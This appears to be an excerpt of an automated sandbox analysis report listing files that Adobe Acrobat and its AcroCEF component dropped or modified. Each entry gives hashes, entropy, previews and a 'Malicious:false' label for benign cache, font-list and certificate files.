                                                                                                MD5:A522E0C73F95D6E8222027EDC6323317
                                                                                                SHA1:2A2060C9ABB197CCA86AE5B72405A161EBCFA537
                                                                                                SHA-256:6F170EB8882814394A28E45D6E58B73D7638AE7AAB24DBB5D7C6C134AA85F7D5
                                                                                                SHA-512:4EAE282AB795C2FCBF6C088FE1EDF53C7CBE802B5D33088A1561E4353C71AB07F4A6CFC30B45F2D9E4CAD62408FB5F34B99F3A9FDB8B2AE4B516E718C1E0E1CF
                                                                                                Malicious:false
                                                                                                Preview:2024/12/18-03:23:22.343 1c08 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/MANIFEST-000001.2024/12/18-03:23:22.346 1c08 Recovering log #3.2024/12/18-03:23:22.346 1c08 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/000003.log .
                                                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                File Type:JSON data
                                                                                                Category:dropped
                                                                                                Size (bytes):508
                                                                                                Entropy (8bit):5.047195090775108
                                                                                                Encrypted:false
                                                                                                SSDEEP:12:YH/um3RA8sqnT/sBdOg2HXcaq3QYiubxnP7E4TfF+:Y2sRdsgTAdMHW3QYhbxP7np+
                                                                                                MD5:70321A46A77A3C2465E2F031754B3E06
                                                                                                SHA1:5E7E713285D36F12ACFC68A34D8A34FD33C96B34
                                                                                                SHA-256:344DA48DA0F9A5CC258E10D6C28086B7718CBE596CDC3D7A2A61C8F5FD781248
                                                                                                SHA-512:E885342B270FE3D538F17F8F80B9ED061B30EE55624177BD81F5C65C033160D71559D60872BC0F99C0C93FAE29F9D09FD5042B68D83CD538154D1335BAC8205D
                                                                                                Malicious:false
                                                                                                Preview:{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13340988966329963","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":144691},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.5","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"3G","CAYSABiAgICA+P////8B":"Offline"}}}
                                                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                File Type:JSON data
                                                                                                Category:dropped
                                                                                                Size (bytes):508
                                                                                                Entropy (8bit):5.047195090775108
                                                                                                Encrypted:false
                                                                                                SSDEEP:12:YH/um3RA8sqnT/sBdOg2HXcaq3QYiubxnP7E4TfF+:Y2sRdsgTAdMHW3QYhbxP7np+
                                                                                                MD5:70321A46A77A3C2465E2F031754B3E06
                                                                                                SHA1:5E7E713285D36F12ACFC68A34D8A34FD33C96B34
                                                                                                SHA-256:344DA48DA0F9A5CC258E10D6C28086B7718CBE596CDC3D7A2A61C8F5FD781248
                                                                                                SHA-512:E885342B270FE3D538F17F8F80B9ED061B30EE55624177BD81F5C65C033160D71559D60872BC0F99C0C93FAE29F9D09FD5042B68D83CD538154D1335BAC8205D
                                                                                                Malicious:false
                                                                                                Preview:{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13340988966329963","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":144691},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.5","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"3G","CAYSABiAgICA+P////8B":"Offline"}}}
                                                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                File Type:JSON data
                                                                                                Category:dropped
                                                                                                Size (bytes):508
                                                                                                Entropy (8bit):5.047195090775108
                                                                                                Encrypted:false
                                                                                                SSDEEP:12:YH/um3RA8sqnT/sBdOg2HXcaq3QYiubxnP7E4TfF+:Y2sRdsgTAdMHW3QYhbxP7np+
                                                                                                MD5:70321A46A77A3C2465E2F031754B3E06
                                                                                                SHA1:5E7E713285D36F12ACFC68A34D8A34FD33C96B34
                                                                                                SHA-256:344DA48DA0F9A5CC258E10D6C28086B7718CBE596CDC3D7A2A61C8F5FD781248
                                                                                                SHA-512:E885342B270FE3D538F17F8F80B9ED061B30EE55624177BD81F5C65C033160D71559D60872BC0F99C0C93FAE29F9D09FD5042B68D83CD538154D1335BAC8205D
                                                                                                Malicious:false
                                                                                                Preview:{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13340988966329963","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":144691},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.5","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"3G","CAYSABiAgICA+P////8B":"Offline"}}}
                                                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                File Type:JSON data
                                                                                                Category:modified
                                                                                                Size (bytes):508
                                                                                                Entropy (8bit):5.057469265871315
                                                                                                Encrypted:false
                                                                                                SSDEEP:12:YH/um3RA8sq/9U5mVSsBdOg2HqYZcaq3QYiubxnP7E4TfF+:Y2sRdsEVJdMHY3QYhbxP7np+
                                                                                                MD5:F21F03D5F554184CC92E3343D1CF39E6
                                                                                                SHA1:F8939F73317F14FEC9B49F8E85A3419DB07A66DF
                                                                                                SHA-256:0EE9E88BD1DD955B7E8DA9BC1DA20AE40F016426CBD21144DBD0A7A0BA3D50BD
                                                                                                SHA-512:9FC71110E64BA713F1FCDFEF3A367D2E784EF1DE3CFCBC2FF952D70F130FAA695AA58D0927E38D9A08A43F6BA76C2681D85316FBE2B3D49DAB58676A645770E7
                                                                                                Malicious:false
                                                                                                Preview:{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13379070212157211","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":585759},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.5","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"3G","CAYSABiAgICA+P////8B":"Offline"}}}
                                                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):4099
                                                                                                Entropy (8bit):5.231977386062189
                                                                                                Encrypted:false
                                                                                                SSDEEP:96:QqBpCqGp3Al+NehBmkID2w6bNMhugoKTNY+No/KTNcygLPGLLUdw51zY:rBpJGp3AoqBmki25ZEVoKTNY+NoCTNLE
                                                                                                MD5:19463E1BC80E238E86C106C021BB1BDF
                                                                                                SHA1:7F13474B25249E8AE1515062C50AA322B3FA3CC2
                                                                                                SHA-256:62B0AE1029AA575BBC52986F23292004F9E9226B11DEF6CBF6B13183BEB4F2A1
                                                                                                SHA-512:81167650FF7BBEACB2BE2DC7049B538B7284522BE991F92EB3383A5FF85EB6D3E220815222800D393AA1A9697C896C3ADB453EE5CDCB51ECF1591E091B0290FC
                                                                                                Malicious:false
                                                                                                Preview:*...#................version.1..namespace-.1a.o................next-map-id.1.Pnamespace-047a745d_5c98_4926_b446_942fb948d072-https://rna-resource.acrobat.com/.0.K..r................next-map-id.2.Snamespace-bdf2fbfe_e08b_407d_8a81_9a6094e373a0-https://rna-v2-resource.acrobat.com/.1.m.Fr................next-map-id.3.Snamespace-24b9c7f4_3e31_4d11_a607_ac91d6485c9e-https://rna-v2-resource.acrobat.com/.2.8.o................next-map-id.4.Pnamespace-bc60f291_faa7_4492_8b22_e186b4ce62c1-https://rna-resource.acrobat.com/.3.A-N^...............Pnamespace-047a745d_5c98_4926_b446_942fb948d072-https://rna-resource.acrobat.com/-j..^...............Pnamespace-bc60f291_faa7_4492_8b22_e186b4ce62c1-https://rna-resource.acrobat.com/[.|.a...............Snamespace-bdf2fbfe_e08b_407d_8a81_9a6094e373a0-https://rna-v2-resource.acrobat.com/....a...............Snamespace-24b9c7f4_3e31_4d11_a607_ac91d6485c9e-https://rna-v2-resource.acrobat.com/.W.@o................next-map-id.5.Pnamespace-8fb46ac3_c992_47ca_bb04_
                                                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                File Type:ASCII text
                                                                                                Category:dropped
                                                                                                Size (bytes):326
                                                                                                Entropy (8bit):5.158573550136084
                                                                                                Encrypted:false
                                                                                                SSDEEP:6:7BIca99+q2P92nKuAl9OmbzNMxIFUt8OBIct3JZmw+OBIcu9VkwO92nKuAl9Ombg:76cvv4HAa8jFUt8O6c//+O6cw5LHAa8E
                                                                                                MD5:044CFB69F8295E1E5F5D4D28FC29E7BE
                                                                                                SHA1:4066613414226CA7441197B2ECA8B5492EA217C4
                                                                                                SHA-256:6B930524AFDAA77176DB1EE319F36A488DD2D4D555D16925D2A076C7428830EA
                                                                                                SHA-512:8A7CA38531A0481CB6BD39C43157D36405C967DBD3977379C3525D08E11C35803F7F1868E813E43925E038D41CFACE3AE2A958DB8F1E361677A93C092D666A6D
                                                                                                Malicious:false
                                                                                                Preview:2024/12/18-03:23:23.285 1c08 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/MANIFEST-000001.2024/12/18-03:23:23.299 1c08 Recovering log #3.2024/12/18-03:23:23.315 1c08 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/000003.log .
                                                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                File Type:ASCII text
                                                                                                Category:dropped
                                                                                                Size (bytes):326
                                                                                                Entropy (8bit):5.158573550136084
                                                                                                Encrypted:false
                                                                                                SSDEEP:6:7BIca99+q2P92nKuAl9OmbzNMxIFUt8OBIct3JZmw+OBIcu9VkwO92nKuAl9Ombg:76cvv4HAa8jFUt8O6c//+O6cw5LHAa8E
                                                                                                MD5:044CFB69F8295E1E5F5D4D28FC29E7BE
                                                                                                SHA1:4066613414226CA7441197B2ECA8B5492EA217C4
                                                                                                SHA-256:6B930524AFDAA77176DB1EE319F36A488DD2D4D555D16925D2A076C7428830EA
                                                                                                SHA-512:8A7CA38531A0481CB6BD39C43157D36405C967DBD3977379C3525D08E11C35803F7F1868E813E43925E038D41CFACE3AE2A958DB8F1E361677A93C092D666A6D
                                                                                                Malicious:false
                                                                                                Preview:2024/12/18-03:23:23.285 1c08 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/MANIFEST-000001.2024/12/18-03:23:23.299 1c08 Recovering log #3.2024/12/18-03:23:23.315 1c08 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/000003.log .
                                                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                File Type:PC bitmap, Windows 3.x format, 107 x -152 x 32, cbSize 65110, bits offset 54
                                                                                                Category:dropped
                                                                                                Size (bytes):65110
                                                                                                Entropy (8bit):3.577890801815996
                                                                                                Encrypted:false
                                                                                                SSDEEP:768:i666odU3lB+fx21TAGBq3C6ofzoBI/NPMb65Lj64ySEMoyEvsQ:ivV8G21TAGBqyzztIgyjMoV
                                                                                                MD5:B09029975CB4B994224ED5CEC0CCE283
                                                                                                SHA1:77A1B349AC993EC67B482A076A98264D7098A316
                                                                                                SHA-256:7107459525647AFCE01D0257D6C91BDB3045C677F9543DF1082EF4795F6A2B28
                                                                                                SHA-512:473EDE6ED4F42F4E4CCD500A9F087BD46B8788F74BCFEDE264FEC576B9B6B6A9A59C27C6948F97F0DBAC8514A71FA4B84FBFF179996D1E36E640F5F63BFA4C6F
                                                                                                Malicious:false
                                                                                                Preview:BMV.......6...(...k...h..... ...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                File Type:Certificate, Version=3
                                                                                                Category:dropped
                                                                                                Size (bytes):1391
                                                                                                Entropy (8bit):7.705940075877404
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:ooVdTH2NMU+I3E0Ulcrgdaf3sWrATrnkC4EmCUkmGMkfQo1fSZotWzD1:ooVguI3Kcx8WIzNeCUkJMmSuMX1
                                                                                                MD5:0CD2F9E0DA1773E9ED864DA5E370E74E
                                                                                                SHA1:CABD2A79A1076A31F21D253635CB039D4329A5E8
                                                                                                SHA-256:96BCEC06264976F37460779ACF28C5A7CFE8A3C0AAE11A8FFCEE05C0BDDF08C6
                                                                                                SHA-512:3B40F27E828323F5B91F8909883A78A21C86551761F27B38029FAAEC14AF5B7AA96FB9F9CC93EE201B5EB1D0FEF17B290747E8B839D2E49A8F36C5EBF3C7C910
                                                                                                Malicious:false
                                                                                                Preview:0..k0..S............@.YDc.c...0...*.H........0O1.0...U....US1)0'..U... Internet Security Research Group1.0...U....ISRG Root X10...150604110438Z..350604110438Z0O1.0...U....US1)0'..U... Internet Security Research Group1.0...U....ISRG Root X10.."0...*.H.............0..........$s..7.+W(.....8..n<.W.x.u...jn..O(..h.lD...c...k....1.!~.3<.H..y.....!.K...qiJffl.~<p..)"......K...~....G.|.H#S.8.O.o...IW..t../.8.{.p!.u.0<.....c...O..K~.....w...{J.L.%.p..)..S$........J.?..aQ.....cq...o[...\4ylv.;.by.../&.....................6....7..6u...r......I.....*.A..v........5/(.l....dwnG7..Y^h..r...A)>Y>.&.$...Z.L@.F....:Qn.;.}r...xY.>Qx....../..>{J.Ks......P.|C.t..t.....0.[q6....00\H..;..}`...).........A.......|.;F.H*..v.v..j.=...8.d..+..(.....B.".'].y...p..N..:..'Qn..d.3CO......B0@0...U...........0...U.......0....0...U......y.Y.{....s.....X..n0...*.H.............U.X....P.....i ')..au\.n...i/..VK..s.Y.!.~.Lq...`.9....!V..P.Y...Y.............b.E.f..|o..;.....'...}~.."......
                                                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                File Type:Microsoft Cabinet archive data, Windows 2000/XP setup, 71954 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
                                                                                                Category:dropped
                                                                                                Size (bytes):71954
                                                                                                Entropy (8bit):7.996617769952133
                                                                                                Encrypted:true
                                                                                                SSDEEP:1536:gc257bHnClJ3v5mnAQEBP+bfnW8Ctl8G1G4eu76NWDdB34w18R5cBWcJAm68+Q:gp2ld5jPqW8LgeulxB3fgcEfDQ
                                                                                                MD5:49AEBF8CBD62D92AC215B2923FB1B9F5
                                                                                                SHA1:1723BE06719828DDA65AD804298D0431F6AFF976
                                                                                                SHA-256:B33EFCB95235B98B48508E019AFA4B7655E80CF071DEFABD8B2123FC8B29307F
                                                                                                SHA-512:BF86116B015FB56709516D686E168E7C9C68365136231CC51D0B6542AE95323A71D2C7ACEC84AAD7DCECC2E410843F6D82A0A6D51B9ACFC721A9C84FDD877B5B
                                                                                                Malicious:false
                                                                                                Preview:MSCF............,...................I..................XaK .authroot.stl.[.i..6..CK..<Tk......4.cl!Kg..E..*Y.f_..".$mR"$.J.E.KB."..rKv.."{.g....3.W.....c..9.s...=....y6#..x..........D......\(.#.s.!.A.......cd.c........+^.ov...n.....3BL..0.......BPUR&.X..02.q...R...J.....w.....b.vy>....-.&..(..oe."."...J9...0U.6J..|U..S.....M.F8g...=.......p...........l.?3.J.x.G.Ep..$g..tj......)v]9(:.)W.8.Op.1Q..:.nPd........7.7..M].V F..g.....12..!7(...B.......h.RZ.......l.<.....6..Z^.`p?... .p.Gp.#.'.X..........|!.8.....".m.49r?.I...g...8.v.....a``.g.R4.i...J8q....NFW,E.6Y....!.o5%.Y.....R..<..S9....r....WO...(.....F..Q=*....-..7d..O(....-..+k.........K..........{Q....Z..j._.E...QZ.~.\.^......N.9.k..O.}dD.b1r...[}/....T..E..G..c.|.c.&>?..^t. ..;..X.d.E.0G....[Q.*,*......#.Dp..L.o|#syc.J............}G-.ou6.=52..XWi=...m.....^u......c..fc?&pR7S5....I...j.G........j.j..Tc.El.....B.pQ.,Bp....j...9g.. >..s..m#.Nb.o_u.M.V...........\#...v..Mo\sF..s....Y...
                                                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):192
                                                                                                Entropy (8bit):2.7673182398396405
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:kkFklDM4EfllXlE/HT8k6YNNX8RolJuRdxLlGB9lQRYwpDdt:kKHMT8kNMa8RdWBwRd
                                                                                                MD5:F444F6FBD3C4787C521304A8781F99BB
                                                                                                SHA1:19C4721E91695D769B7C8FEF9DEE3C9B79068AF9
                                                                                                SHA-256:10BBFDF83CA34A76D6391068121451F5B57FD0712C47593F007746A9D9894EC2
                                                                                                SHA-512:E183E72FDCB0BFB2273AC362D1268300B1109FB648610F531CA57C0B22B227A808C9008149785A6975B8FCEC3837425AC206B3A3DABE2E7B76E452D354ECCEF1
                                                                                                Malicious:false
                                                                                                Preview:p...... ...........!&Q..(....................................................... ..........W.....w..............o...h.t.t.p.:././.x.1...i...l.e.n.c.r...o.r.g./...".6.4.c.d.6.6.5.4.-.5.6.f."...
                                                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                File Type:data
                                                                                                Category:modified
                                                                                                Size (bytes):328
                                                                                                Entropy (8bit):3.2418003062782916
                                                                                                Encrypted:false
                                                                                                SSDEEP:6:kKb9UswD8HGsL+N+SkQlPlEGYRMY9z+4KlDA3RUebT3:6DImsLNkPlE99SNxAhUe/3
                                                                                                MD5:677EA01F5804641444976849ED64AB38
                                                                                                SHA1:8D562FCFBB99325BBF12BCCFA22DDA8EFB00B1B6
                                                                                                SHA-256:020EFCD1AC08F437CBD2E1BE4C3FDFE822147D56C6809AE3C3B36E780C8272DF
                                                                                                SHA-512:8663970DB97F62E6423F428C840C1911C3D2B97498F42F13BDBB8A0E4218DD39E98A37FED51CEBF72CE3CE78C37B1367FF2CFF6665143B8D36F9AB6B851592A9
                                                                                                Malicious:false
                                                                                                Preview:p...... .........B4&Q..(....................................................... ........G..@.......&......X........h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".a.7.2.8.2.e.b.4.0.b.1.d.a.1.:.0."...
                                                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                File Type:PostScript document text
                                                                                                Category:dropped
                                                                                                Size (bytes):1233
                                                                                                Entropy (8bit):5.233980037532449
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:kk8id8HxPsMTtrid8OPgx4sMDHFidZxDWksMwEidMKRxCsMWaOtidMLgxT2sMW0l:pkxPhtgNgx4pyZxakazxCIK2gxap
                                                                                                MD5:8BA9D8BEBA42C23A5DB405994B54903F
                                                                                                SHA1:FC1B1646EC8A7015F492AA17ADF9712B54858361
                                                                                                SHA-256:862DE2165B9D44422E84E25FFE267A5E1ADE23F46F04FC6F584C4943F76EB75C
                                                                                                SHA-512:26AD41BB89AF6198515674F21B4F0F561DC9BDC91D5300C154065C57D49CCA61B4BA60E5F93FD17869BDA1123617F26CDA0EF39935A9C2805F930A3DB1956D5A
                                                                                                Malicious:false
                                                                                                Preview:%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-H.Registry:Adobe.Ordering:Identity.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-H.FileLength:8228.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-V.Registry:Adobe.Ordering:Identity.UseCMap:Identity-H.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-V.FileLength:2761.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UCS2-GBK-EUC.Registry:Adobe.Ordering:UCS2_GBK_EUC.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UCS2-GBK-EUC.FileLength:243835.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UniKS-UTF16-H.Registry:Adobe.Ordering:Korea1.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UniKS-UTF16-H.FileLength:131902.FileModTime:1612212568.%EndFont..%BeginFont.Handler:D
                                                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                File Type:PostScript document text
                                                                                                Category:dropped
                                                                                                Size (bytes):1233
                                                                                                Entropy (8bit):5.233980037532449
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:kk8id8HxPsMTtrid8OPgx4sMDHFidZxDWksMwEidMKRxCsMWaOtidMLgxT2sMW0l:pkxPhtgNgx4pyZxakazxCIK2gxap
                                                                                                MD5:8BA9D8BEBA42C23A5DB405994B54903F
                                                                                                SHA1:FC1B1646EC8A7015F492AA17ADF9712B54858361
                                                                                                SHA-256:862DE2165B9D44422E84E25FFE267A5E1ADE23F46F04FC6F584C4943F76EB75C
                                                                                                SHA-512:26AD41BB89AF6198515674F21B4F0F561DC9BDC91D5300C154065C57D49CCA61B4BA60E5F93FD17869BDA1123617F26CDA0EF39935A9C2805F930A3DB1956D5A
                                                                                                Malicious:false
                                                                                                Preview:%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-H.Registry:Adobe.Ordering:Identity.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-H.FileLength:8228.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-V.Registry:Adobe.Ordering:Identity.UseCMap:Identity-H.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-V.FileLength:2761.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UCS2-GBK-EUC.Registry:Adobe.Ordering:UCS2_GBK_EUC.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UCS2-GBK-EUC.FileLength:243835.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UniKS-UTF16-H.Registry:Adobe.Ordering:Korea1.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UniKS-UTF16-H.FileLength:131902.FileModTime:1612212568.%EndFont..%BeginFont.Handler:D
                                                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                File Type:PostScript document text
                                                                                                Category:dropped
                                                                                                Size (bytes):1233
                                                                                                Entropy (8bit):5.233980037532449
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:kk8id8HxPsMTtrid8OPgx4sMDHFidZxDWksMwEidMKRxCsMWaOtidMLgxT2sMW0l:pkxPhtgNgx4pyZxakazxCIK2gxap
                                                                                                MD5:8BA9D8BEBA42C23A5DB405994B54903F
                                                                                                SHA1:FC1B1646EC8A7015F492AA17ADF9712B54858361
                                                                                                SHA-256:862DE2165B9D44422E84E25FFE267A5E1ADE23F46F04FC6F584C4943F76EB75C
                                                                                                SHA-512:26AD41BB89AF6198515674F21B4F0F561DC9BDC91D5300C154065C57D49CCA61B4BA60E5F93FD17869BDA1123617F26CDA0EF39935A9C2805F930A3DB1956D5A
                                                                                                Malicious:false
                                                                                                Preview:%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-H.Registry:Adobe.Ordering:Identity.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-H.FileLength:8228.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-V.Registry:Adobe.Ordering:Identity.UseCMap:Identity-H.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-V.FileLength:2761.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UCS2-GBK-EUC.Registry:Adobe.Ordering:UCS2_GBK_EUC.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UCS2-GBK-EUC.FileLength:243835.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UniKS-UTF16-H.Registry:Adobe.Ordering:Korea1.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UniKS-UTF16-H.FileLength:131902.FileModTime:1612212568.%EndFont..%BeginFont.Handler:D
                                                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                File Type:PostScript document text
                                                                                                Category:dropped
                                                                                                Size (bytes):10880
                                                                                                Entropy (8bit):5.214360287289079
                                                                                                Encrypted:false
                                                                                                SSDEEP:192:SgAYm4DAv6oq6oCf6ocL6oz6o46ok6o16ok6oKls6oVtfZ6ojtou6o2ti16oGwX/:SV548vvqvSvivzv4vkv1vkvKlsvVtfZp
                                                                                                MD5:B60EE534029885BD6DECA42D1263BDC0
                                                                                                SHA1:4E801BA6CA503BDAE7E54B7DB65BE641F7C23375
                                                                                                SHA-256:B5F094EFF25215E6C35C46253BA4BB375BC29D055A3E90E08F66A6FDA1C35856
                                                                                                SHA-512:52221F919AEA648B57E567947806F71922B604F90AC6C8805E5889AECB131343D905D94703EA2B4CEC9B0C1813DDA6EAE2677403F58D3B340099461BBCD355AE
                                                                                                Malicious:false
                                                                                                Preview:%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-H.Registry:Adobe.Ordering:Identity.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-H.FileLength:8228.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-V.Registry:Adobe.Ordering:Identity.UseCMap:Identity-H.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-V.FileLength:2761.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UCS2-GBK-EUC.Registry:Adobe.Ordering:UCS2_GBK_EUC.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UCS2-GBK-EUC.FileLength:243835.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UniKS-UTF16-H.Registry:Adobe.Ordering:Korea1.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UniKS-UTF16-H.FileLength:131902.FileModTime:1612212568.%EndFont..%BeginFont.Handler:D
                                                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                File Type:PostScript document text
                                                                                                Category:dropped
                                                                                                Size (bytes):10880
                                                                                                Entropy (8bit):5.214360287289079
                                                                                                Encrypted:false
                                                                                                SSDEEP:192:SgAYm4DAv6oq6oCf6ocL6oz6o46ok6o16ok6oKls6oVtfZ6ojtou6o2ti16oGwX/:SV548vvqvSvivzv4vkv1vkvKlsvVtfZp
                                                                                                MD5:B60EE534029885BD6DECA42D1263BDC0
                                                                                                SHA1:4E801BA6CA503BDAE7E54B7DB65BE641F7C23375
                                                                                                SHA-256:B5F094EFF25215E6C35C46253BA4BB375BC29D055A3E90E08F66A6FDA1C35856
                                                                                                SHA-512:52221F919AEA648B57E567947806F71922B604F90AC6C8805E5889AECB131343D905D94703EA2B4CEC9B0C1813DDA6EAE2677403F58D3B340099461BBCD355AE
                                                                                                Malicious:false
